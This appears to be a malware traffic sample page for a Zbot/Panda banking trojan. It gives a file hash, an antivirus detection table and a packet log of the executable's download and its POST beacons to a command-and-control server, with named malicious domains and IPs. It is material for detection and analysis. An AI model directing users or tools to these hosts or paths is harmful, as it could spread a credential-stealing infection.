dogovor.exe POST /web Panda Zbot Banking Malware Trojan PCAP file download Traffic Sample

Attachment: 1 pcap (dog), 19 KB
Date added: October 27, 2016 1:05 am, added by admin
SHA256: 74f98f92d0536a98c39bd7110f47d3ef4f61b916915386484b8da175fe35110d
File name: dogovor.exe
Detection ratio: 18 / 55
Analysis date: 2016-10-27 00:53:00 UTC

Engine                   Result                                      Update
Ad-Aware                 Trojan.GenericKD.3636701                    20161027
AegisLab                 Uds.Dangerousobject.Multi!c                 20161026
Arcabit                  Trojan.Generic.D377DDD                      20161026
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9945  20161026
BitDefender              Trojan.GenericKD.3636701                    20161027
Bkav                     W32.eHeur.Malware11                         20161026
CrowdStrike Falcon (ML)  malicious_confidence_69% (W)                20160725
DrWeb                    Trojan.PWS.Panda.10151                      20161027
ESET-NOD32               a variant of Win32/Kryptik.FIOO             20161027
Emsisoft                 Trojan.GenericKD.3636701 (B)                20161027
F-Secure                 Trojan.GenericKD.3636701                    20161027
GData                    Trojan.GenericKD.3636701                    20161027
Invincea                 generic.a                                   20161018
Kaspersky                Trojan-Spy.Win32.Zbot.xipi                  20161027
McAfee                   Artemis!0860360612D8                        20161027
McAfee-GW-Edition        BehavesLike.Win32.BadFile.gc                20161027
eScan                    Trojan.GenericKD.3636701                    20161027
Symantec

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AUBF/detailed-analysis.aspx


2016-10-26 20:51:36.511174 IP 192.168.1.102.50052 > 155.94.239.146.80: Flags [P.], seq 0:311, ack 1, win 256, length 311: HTTP: GET /buhgalter/dogovor.exe HTTP/1.1
GET /buhgalter/dogovor.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: popularorderweddingstyle.ru
Connection: Keep-Alive

2016-10-26 20:51:36.680521 IP 192.168.1.102.54678 > 75.75.76.76.53: 65257+ A? popularorderweddingstyle.ru. (45)

2016-10-26 20:52:19.015872 IP 192.168.1.102.50055 > 23.95.37.72.80: Flags [P.], seq 0:509, ack 1, win 256, length 509: HTTP: POST /web/ HTTP/1.1
POST /web/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: antonovaeroconceptflypower.ru
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

[288-byte binary request body omitted]

2016-10-26 20:52:24.710515 IP 192.168.1.102.50056 > 23.95.37.72.80: Flags [P.], seq 0:509, ack 1, win 256, length 509: HTTP: POST /web/ HTTP/1.1
POST /web/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: antonovaeroconceptflypower.ru
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

[288-byte binary request body omitted]

2016-10-26 20:52:25.149391 IP 192.168.1.102.50056 > 23.95.37.72.80: Flags [.], ack 234, win 255, length 0

2016-10-26 20:52:30.362084 IP 192.168.1.102.50057 > 23.95.37.72.80: Flags [P.], seq 0:509, ack 1, win 256, length 509: HTTP: POST /web/ HTTP/1.1
POST /web/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: antonovaeroconceptflypower.ru
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

[288-byte binary request body omitted]
